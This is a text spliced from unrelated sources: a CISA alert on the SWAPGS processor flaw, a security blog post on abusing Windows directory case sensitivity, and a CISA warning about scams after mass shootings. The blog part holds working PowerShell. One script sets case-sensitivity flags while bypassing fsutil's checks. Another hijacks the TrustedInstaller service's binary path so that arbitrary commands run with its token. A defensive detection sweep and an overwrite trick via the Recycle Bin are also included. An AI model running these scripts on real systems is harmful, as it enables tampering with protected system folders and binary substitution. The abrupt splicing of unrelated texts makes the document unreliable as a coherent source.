The Cybersecurity and Infrastructure Security Agency (CISA) is aware of a vulnerability (CVE-2019-1125), known as SWAPGS, that affects modern computer processors. SWAPGS is a variant of Spectre Variant 1 and, like the other Spectre variants, requires the attacker to run code locally on the affected system; it can then be exploited to steal sensitive data present in the system's memory.
Spectre is a flaw an attacker can exploit to force a program to reveal its data. The name derives from "speculative execution", an optimization in which the processor executes instructions ahead of time, before it knows whether they are actually needed, so that it does not stall waiting on a slow operation. Results of mispredicted speculation are discarded, but the traces they leave in the processor's caches can be measured, and that is what Spectre-class attacks exploit. Spectre affects almost all devices, including desktops, laptops, and cloud servers.
CISA encourages users and administrators to review the following guidance, refer to their hardware and software vendors for additional details, and apply an appropriate patch when available:
In the first post of this 3-part blog series, we covered the implications of promoting files to "Evil Twins": once case sensitivity is enabled on a directory, two files whose names differ only in case can be created and remain on the system as different entities.
In this second post we abuse applications that do not cope with case-sensitivity (CS) changes, exploiting years of "normalization" assumptions, that is, code written on the premise that Windows file names are case insensitive.
It is worth noting that the impact of this change varies depending on the target folder.
Out of the box, Windows ships fsutil.exe (fsutil file setCaseSensitiveInfo <path> enable|disable) to change a directory's CS flag. Under the hood it opens the directory and calls the native API NtSetInformationFile with the FileCaseSensitiveInformation class, passing a FILE_CASE_SENSITIVE_INFORMATION structure whose Flags field carries FILE_CS_FLAG_CASE_SENSITIVE_DIR.
fsutil performs several checks in user mode to restrict which folders it will touch but, as usual, these are easy to sidestep with alternative spellings of the same path, and they disappear entirely if you call the API directly, whether from a small custom tool or from PowerShell. Only the kernel-side checks remain: the directory's ACL, and the refusal to disable CS while names that differ only in case still exist in the directory.
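The following PowerShell script is an added example, not code from the original post, showing what "invoke the API directly" looks like: it opens the target directory, reads its current CS flag with NtQueryInformationFile, and then sets or clears the flag with NtSetInformationFile, never touching fsutil.exe. It assumes Windows 10 1803 or later on NTFS and that the caller has FILE_WRITE_ATTRIBUTES on the directory; the kernel still enforces that ACL, which is exactly why the TrustedInstaller trick described below is needed for some folders.

```powershell
# Added example: toggle a directory's case-sensitivity flag by calling
# NtSetInformationFile directly, bypassing fsutil.exe and its user-mode checks.
# Not code from the original post. Assumptions: Windows 10 1803+ on NTFS and
# FILE_WRITE_ATTRIBUTES on the target directory (the kernel still checks the ACL).
param(
    [Parameter(Mandatory)] [string] $Path,
    [switch] $Disable
)

Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;

public static class CaseSens
{
    // IO_STATUS_BLOCK: { union { NTSTATUS Status; PVOID Pointer; }; ULONG_PTR Information; }
    [StructLayout(LayoutKind.Sequential)]
    public struct IO_STATUS_BLOCK { public IntPtr Status; public IntPtr Information; }

    // Payload for the FileCaseSensitiveInformation (71) information class.
    [StructLayout(LayoutKind.Sequential)]
    public struct FILE_CASE_SENSITIVE_INFORMATION { public uint Flags; }

    public const int  FileCaseSensitiveInformation   = 71;
    public const uint FILE_CS_FLAG_CASE_SENSITIVE_DIR = 0x00000001;

    public const uint FILE_READ_ATTRIBUTES       = 0x00000080;
    public const uint FILE_WRITE_ATTRIBUTES      = 0x00000100;
    public const uint FILE_SHARE_READ            = 0x00000001;
    public const uint FILE_SHARE_WRITE           = 0x00000002;
    public const uint OPEN_EXISTING              = 3;
    public const uint FILE_FLAG_BACKUP_SEMANTICS = 0x02000000; // required to open a directory handle

    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern IntPtr CreateFileW(string lpFileName, uint dwDesiredAccess,
        uint dwShareMode, IntPtr lpSecurityAttributes, uint dwCreationDisposition,
        uint dwFlagsAndAttributes, IntPtr hTemplateFile);

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr hObject);

    [DllImport("ntdll.dll")]
    public static extern int NtQueryInformationFile(IntPtr FileHandle,
        ref IO_STATUS_BLOCK IoStatusBlock, ref FILE_CASE_SENSITIVE_INFORMATION FileInformation,
        uint Length, int FileInformationClass);

    [DllImport("ntdll.dll")]
    public static extern int NtSetInformationFile(IntPtr FileHandle,
        ref IO_STATUS_BLOCK IoStatusBlock, ref FILE_CASE_SENSITIVE_INFORMATION FileInformation,
        uint Length, int FileInformationClass);
}
"@

$access = [CaseSens]::FILE_READ_ATTRIBUTES -bor [CaseSens]::FILE_WRITE_ATTRIBUTES
$handle = [CaseSens]::CreateFileW($Path, $access,
    [CaseSens]::FILE_SHARE_READ -bor [CaseSens]::FILE_SHARE_WRITE,
    [IntPtr]::Zero, [CaseSens]::OPEN_EXISTING,
    [CaseSens]::FILE_FLAG_BACKUP_SEMANTICS, [IntPtr]::Zero)
if ($handle -eq [IntPtr]::Zero -or $handle -eq [IntPtr](-1)) {
    $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
    throw "CreateFileW('$Path') failed, Win32 error $err (access denied here means the ACL, not fsutil, stopped you)"
}

try {
    $iosb = New-Object -TypeName 'CaseSens+IO_STATUS_BLOCK'
    $info = New-Object -TypeName 'CaseSens+FILE_CASE_SENSITIVE_INFORMATION'
    $size = [uint32][Runtime.InteropServices.Marshal]::SizeOf($info)

    # Read the current state first so the change is visible in the output.
    $status = [CaseSens]::NtQueryInformationFile($handle, [ref]$iosb, [ref]$info, $size,
        [CaseSens]::FileCaseSensitiveInformation)
    if ($status -ne 0) { throw ("NtQueryInformationFile failed, NTSTATUS 0x{0:X8}" -f $status) }
    $before = ($info.Flags -band [CaseSens]::FILE_CS_FLAG_CASE_SENSITIVE_DIR) -ne 0

    # Set or clear the flag. Disabling is refused by the kernel while the directory
    # still contains names that differ only in case (the check the post describes).
    $info.Flags = if ($Disable) { 0 } else { [CaseSens]::FILE_CS_FLAG_CASE_SENSITIVE_DIR }
    $status = [CaseSens]::NtSetInformationFile($handle, [ref]$iosb, [ref]$info, $size,
        [CaseSens]::FileCaseSensitiveInformation)
    if ($status -ne 0) { throw ("NtSetInformationFile failed, NTSTATUS 0x{0:X8}" -f $status) }

    "{0}: case sensitive {1} -> {2}" -f $Path, $before, (-not $Disable)
}
finally {
    [void][CaseSens]::CloseHandle($handle)
}
```

Run it as `.\Set-CaseSensitive.ps1 -Path C:\target` to enable and add `-Disable` to clear the flag. Note that nothing in the script validates the path: the only thing standing between it and any directory on the system is the access check the kernel performs when CreateFileW asks for FILE_WRITE_ATTRIBUTES.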
Let us go over the following scenarios:
Changing ROOT drive CS:
The fsutil restrictions are bypassed, but most console commands then stop working unless you type full paths, largely because the paths stored in environment variables no longer match the on-disk names once case matters.
For some folders it is not enough to be Administrator; the ACL grants the required access to a different principal instead.
TrustedInstaller has the required permissions, and an administrator only needs to change the TrustedInstaller service's binary path to get a tool launched with that account's token.
If you change the case sensitivity of the Windows folder using the same technique, Windows will no longer boot.
These scenarios introduce unexpected behaviors in existing applications. For instance:
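The service-path pivot described above, as an added example that is not part of the original post: the script temporarily rewrites the TrustedInstaller service's binary path to an arbitrary command, starts the service so the Service Control Manager launches that command with the service's token (LocalSystem plus the NT SERVICE\TrustedInstaller service SID, which is what the Program Files ACL grants access to), and then puts the original path back. It assumes an elevated PowerShell session; the example command string is an illustration and would be replaced with the tool you actually want to run.

```powershell
# Added example: run a command under the TrustedInstaller service's token by
# temporarily changing the service's binary path. Not code from the original
# post. Assumes an elevated session on Windows 10; the command is an illustration.
param(
    # Example only: enable CS on a folder whose ACL refuses plain Administrators.
    [string] $Command = 'cmd.exe /c fsutil file setCaseSensitiveInfo "C:\Program Files" enable'
)

$svcName = 'TrustedInstaller'
$svc = Get-CimInstance Win32_Service -Filter "Name='$svcName'"
if (-not $svc) { throw "Service $svcName not found" }

# Keep the current path so it can be restored. Win32_Service returns it expanded
# (normally C:\Windows\servicing\TrustedInstaller.exe), which is fine for restore.
$originalPath = $svc.PathName

if ($svc.State -ne 'Stopped') {
    Stop-Service -Name $svcName -Force
}

function Set-ServicePath([Microsoft.Management.Infrastructure.CimInstance] $Service, [string] $Path) {
    # Win32_Service.Change maps to ChangeServiceConfig; using CIM avoids the
    # quoting problems of passing a nested-quote command line to sc.exe.
    $r = Invoke-CimMethod -InputObject $Service -MethodName Change -Arguments @{ PathName = $Path }
    if ($r.ReturnValue -ne 0) { throw "Change(PathName) failed with code $($r.ReturnValue)" }
}

try {
    Set-ServicePath $svc $Command

    # The command is not a real service and never reports SERVICE_RUNNING, so the
    # SCM gives up with error 1053 after its timeout. By then the process has
    # already run with the service's token, so the error is expected here.
    Start-Service -Name $svcName -ErrorAction SilentlyContinue
}
finally {
    # Always restore the original path, even if the command failed.
    Set-ServicePath $svc $originalPath
}

"Restored $svcName binary path to '$originalPath'"
```

Two things are worth noting about why this works: the administrator never gains TrustedInstaller's permissions directly, only the ability to make the SCM start something with them, and the change leaves a trail (the service's ImagePath value is rewritten twice), which is what the detection sweep later in this post keys on.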
1. There is a folder with CS enabled containing two directories with the same name but different case.
2. Trying to disable CS on the folder fails, because of the "multiple files/folders with the same name already exist" check.
3. Move one of the two directories to the Recycle Bin.
4. Disable CS on the folder; the check now passes.
5. Restore the deleted directory from the Recycle Bin.
6. Its contents overwrite the directory that was kept: with CS off, both names now resolve to the same entry.
Left: Root drive with case sensitivity enabled.
Right: Program Files CS changed thanks to the TrustedInstaller ACL. If an application does not preserve the proper case, the next time it executes a binary whose name it normalizes (for example to uppercase) it can spawn a different program than the one intended.
Watch the video recorded by our expert Cedric Cochin illustrating this technique:
Protection and Detection with McAfee Products
Products that rely on SysCore will protect C:\ from case-sensitivity changes.
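For readers without that product, here is an added defender-side sweep that is neither McAfee's code nor part of the original post. It reports every directory under the chosen roots whose case-sensitivity flag is set (via fsutil file queryCaseSensitiveInfo), lists any "evil twin" names inside them that differ only in case, and warns if the TrustedInstaller service's binary path is not the expected servicing executable, since that path is the pivot used earlier in the post. The roots, depth, and the expected TrustedInstaller path are assumptions to adjust for your environment.

```powershell
# Added example (not McAfee's or the original post's code): sweep for
# case-sensitive directories, same-name-different-case twins inside them, and a
# tampered TrustedInstaller binary path. Assumes Windows 10 1803+ with fsutil.exe.
param(
    [string[]] $Roots = @('C:\Program Files', 'C:\Program Files (x86)'),  # assumption: adjust as needed
    [int] $MaxDepth = 2
)

function Test-CaseSensitiveDir([string] $Dir) {
    # fsutil prints "Case sensitive attribute on directory <dir> is enabled." or "... is disabled."
    $out = & fsutil.exe file queryCaseSensitiveInfo $Dir 2>$null
    return (($out -join ' ') -match 'is enabled')
}

function Get-CaseTwins([string] $Dir) {
    # Group children by lowercased name; any group with more than one entry can
    # only exist because the directory is case sensitive.
    Get-ChildItem -LiteralPath $Dir -Force -ErrorAction SilentlyContinue |
        Group-Object { $_.Name.ToLowerInvariant() } |
        Where-Object Count -gt 1 |
        ForEach-Object { $_.Group.FullName }
}

function Get-DirsToDepth([string] $Root, [int] $Depth) {
    $Root
    if ($Depth -gt 0) {
        Get-ChildItem -LiteralPath $Root -Directory -Force -ErrorAction SilentlyContinue |
            ForEach-Object { Get-DirsToDepth $_.FullName ($Depth - 1) }
    }
}

# One fsutil call per directory is slow, which is why the depth is bounded.
$findings = foreach ($root in $Roots) {
    foreach ($dir in Get-DirsToDepth $root $MaxDepth) {
        if (Test-CaseSensitiveDir $dir) {
            [pscustomobject]@{
                Directory = $dir
                Twins     = (@(Get-CaseTwins $dir) -join '; ')
            }
        }
    }
}

# The TrustedInstaller service path is what the pivot above rewrites; anything
# other than the servicing binary deserves a look.
$ti = Get-CimInstance Win32_Service -Filter "Name='TrustedInstaller'"
$expected = Join-Path $env:SystemRoot 'servicing\TrustedInstaller.exe'   # assumption: default install
if ($ti -and $ti.PathName.Trim('"') -ne $expected) {
    Write-Warning "TrustedInstaller binary path is '$($ti.PathName)', expected '$expected'"
}

if ($findings) { $findings | Format-Table -AutoSize } else { "No case-sensitive directories found under: $($Roots -join ', ')" }
```

A directory with the flag set is not by itself malicious (WSL users enable it deliberately), but one under Program Files, or one that already contains twins, is exactly the precondition for the substitution shown in the screenshots above and is worth investigating.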
In the wake of the recent shootings in El Paso, TX, and Dayton, OH, the Cybersecurity and Infrastructure Security Agency (CISA) advises users to watch out for possible malicious cyber activity seeking to capitalize on these tragic events. Users should exercise caution in handling emails related to the shootings, even if they appear to originate from trusted sources. Fraudulent emails often contain links or attachments that direct users to phishing or malware-infected websites. Emails requesting donations from duplicitous charitable organizations are also common after tragic events. Be wary of fraudulent social media pleas, calls, texts, donation websites, and door-to-door solicitations relating to these events.
To avoid becoming a victim of malicious activity, users and administrators should consider taking the following preventive measures: